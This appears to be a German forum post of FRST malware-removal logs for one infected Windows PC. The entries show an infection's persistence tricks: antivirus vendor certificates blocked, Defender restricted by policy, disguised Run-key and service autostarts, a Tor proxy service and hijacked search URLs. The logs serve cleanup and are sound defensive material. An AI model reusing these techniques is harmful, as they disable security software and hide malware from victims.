"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
         

FRST:

Code: Alles auswählenAufklappen

ATTFilter

Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (31-05-2018 14:13:17) Run:1
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [resolve_run] => C:\Program Files (x86)\Common Files\new.bat [184 2018-05-25] ()
C:\Program Files (x86)\Common Files\new.bat
HKLM\...\Policies\Explorer\Run: [Chrome Update Helper] => C:\Users\Nico\AppData\Local\Temp\dx10r.exe
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe 
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = 
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
